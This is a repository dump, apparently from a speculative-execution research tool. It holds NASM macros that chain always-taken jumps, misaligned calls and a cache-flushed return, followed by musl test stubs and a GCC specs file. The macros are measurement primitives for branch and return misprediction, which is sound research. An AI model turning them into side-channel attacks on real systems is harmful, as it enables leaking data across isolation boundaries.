    mov rdx, len
    mov rax, SYS_WRITE
    mov QWORD[val], 0
    syscall
%%.skip:
%endmacro

; jmpnext: a conditional jump to the very next instruction.
; `cmp rax, rax` always sets ZF, so the jle is always taken.
%macro jmpnext 0
    cmp rax, rax
    jle %%.label
%%.label:
%endmacro

; jmpnextN: N consecutive copies of jmpnext, built by doubling.
%macro jmpnext2 0
    jmpnext
    jmpnext
%endmacro

%macro jmpnext4 0
    jmpnext2
    jmpnext2
%endmacro

%macro jmpnext8 0
    jmpnext4
    jmpnext4
%endmacro

%macro jmpnext16 0
    jmpnext8
    jmpnext8
%endmacro

%macro jmpnext32 0
    jmpnext16
    jmpnext16
%endmacro

%macro jmpnext64 0
    jmpnext32
    jmpnext32
%endmacro

%macro jmpnext128 0
    jmpnext64
    jmpnext64
%endmacro

%macro jmpnext256 0
    jmpnext128
    jmpnext128
%endmacro

; callnext: call the label placed right after the `ret`.
; Execution continues at the label with one extra return address on the
; stack; that address points at the `ret` instruction of this expansion.
%macro callnext 0
    call %%.label
    ret
%%.label:
%endmacro

; pushret: push the address of the label and return to it.
; The stack slot holding that address is flushed from the cache (clflush +
; mfence) before the `ret`, so the return target has to be loaded from
; memory. No `call` precedes the `ret`.
%macro pushret 0
    push %%.label
    clflush[rsp]
    mfence
    ret
%%.label:
%endmacro


--------------------------------------------------------------------------------
/tests/musl/libc.a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibm-research/speculator/b8416a5756d2bc3f9fe515a34e0196bd51373a99/tests/musl/libc.a
--------------------------------------------------------------------------------
/tests/musl/libc.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibm-research/speculator/b8416a5756d2bc3f9fe515a34e0196bd51373a99/tests/musl/libc.so
--------------------------------------------------------------------------------
/tests/musl/libcrypt.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/libdl.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/libm.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/libpthread.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/libresolv.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/librt.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/libutil.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/libxnet.a:
--------------------------------------------------------------------------------
1 | !
2 |
--------------------------------------------------------------------------------
/tests/musl/musl-gcc.specs:
--------------------------------------------------------------------------------
# GCC specs file for building against musl instead of the system libc.
# NOTE(review): the include, library and crt*.o locations below are absolute
# paths under /home/mbr/repositories/musl-root, i.e. the musl install tree of
# the machine this file was generated on. On any other host the file has to
# be regenerated for the local musl install; otherwise the build fails or
# picks up whatever exists at that path.
%rename cpp_options old_cpp_options

*cpp_options:
-nostdinc -isystem /home/mbr/repositories/musl-root/include -isystem include%s %(old_cpp_options)

*cc1:
%(cc1_cpu) -nostdinc -isystem /home/mbr/repositories/musl-root/include -isystem include%s

*link_libgcc:
-L/home/mbr/repositories/musl-root/lib -L .%s

*libgcc:
libgcc.a%s %:if-exists(libgcc_eh.a%s)

*startfile:
%{!shared: /home/mbr/repositories/musl-root/lib/%{pie:S}crt1.o} /home/mbr/repositories/musl-root/lib/crti.o %{shared|pie:crtbeginS.o%s;:crtbegin.o%s}

*endfile:
%{shared|pie:crtendS.o%s;:crtend.o%s} /home/mbr/repositories/musl-root/lib/crtn.o

*link:
-dynamic-linker /lib/ld-musl-x86_64.so.1 -nostdlib %{shared:-shared} %{static:-static} %{rdynamic:-export-dynamic}

*esp_link:


*esp_options:


*esp_cpp_options:



--------------------------------------------------------------------------------